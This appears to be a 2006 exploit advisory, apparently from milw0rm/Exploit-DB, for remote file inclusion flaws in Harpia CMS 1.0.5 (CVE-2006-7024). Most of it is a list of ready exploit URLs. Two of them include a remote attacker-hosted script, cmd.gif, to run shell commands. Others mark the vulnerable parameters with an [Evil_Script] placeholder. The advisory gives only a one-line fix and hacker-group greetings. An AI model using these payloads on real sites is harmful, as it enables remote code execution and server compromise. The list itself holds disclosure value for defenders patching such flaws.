Harpia CMS 1.0.5 - Remote File Inclusion
Author: Kw3[R]Ln
type: webapps
platform: php
port:
date_added: 2006-06-21
date_updated: 2016-08-16
verified: 1
codes: OSVDB-35691;CVE-2006-7024;OSVDB-35690;OSVDB-35689;OSVDB-35688;OSVDB-35687;OSVDB-35686;OSVDB-35685;OSVDB-35684;OSVDB-35683;OSVDB-35682;OSVDB-35681;OSVDB-35680;OSVDB-35677;OSVDB-35676
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comharpia-1.0.5.zip
---------------------------------------------------------------------------
Harpia CMS <= 1.0.5 Remote File Include Vulnerabilities
---------------------------------------------------------------------------
Discovered By Kw3[R]Ln [ Romanian Security Team ]
Remote : Yes
Critical Level : Dangerous
---------------------------------------------------------------------------
Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Harpia
version : LATEST VERSION 1.0.5
URL : http://sourceforge.net/projects/harpia
------------------------------------------------------------------
Exploit:
~~~~~~~
http://www.site.com/preload.php?config=owned&func_prog=http://site.com/cmd.gif?&cmd=ls
http://www.site.com/index.php?config=owned&func_prog=http://site.com/cmd.gif?&cmd=ls
http://www.site.com/missing.php?header_prog=[Evil_Script]
http://www.site.com/_inc/footer.php?theme_root=[Evil_Script]
http://www.site.com/_inc/header.php?mod_root=[Evil_Script]
http://www.site.com/_inc/header.php?theme_root=[Evil_Script]
http://www.site.com/_inc/pfooter.php?theme_root=[Evil_Script]
http://www.site.com/_inc/pheader.php?theme_root=[Evil_Script]
http://www.site.com/_inc/web_statsConfig.php?mod_dir=[Evil_Script]
http://www.site.com/_inc/web_statsConfig.php?php_ext=[Evil_Script]
http://www.site.com/_mods/email.php?header_prog=[Evil_Script]
http://www.site.com/_mods/files.php?header_prog=[Evil_Script]
http://www.site.com/_mods/files.php?footer_prog=[Evil_Script]
http://www.site.com/_mods/headlines.php?header_prog=[Evil_Script]
http://www.site.com/_mods/search.php?header_prog=[Evil_Script]
http://www.site.com/_mods/topics.php?header_prog=[Evil_Script]
http://www.site.com/_mods/users.php?header_prog=[Evil_Script]
---------------------------------------------------------------------------
Solution :
~~~~~~~~~
declare variabels
---------------------------------------------------------------------------
Shoutz:
~~~~~
# Special greetz to my good friend [Oo]
# To all members of h4cky0u.org ;) and Romanian Security Team [ hTTp://Romania.HackTECK.BE ]
---------------------------------------------------------------------------
*/
Contact:
~~~~~~~
Nick : Kw3rLn
E-mail: ciriboflacs[at]YaHoo[dot]Com
Homepage: hTTp://Romania.HackTECK.BE & http://www.h4cky0u.org/
/*
-------------------------------- [ EOF] ----------------------------------
# milw0rm.com [2006-06-22]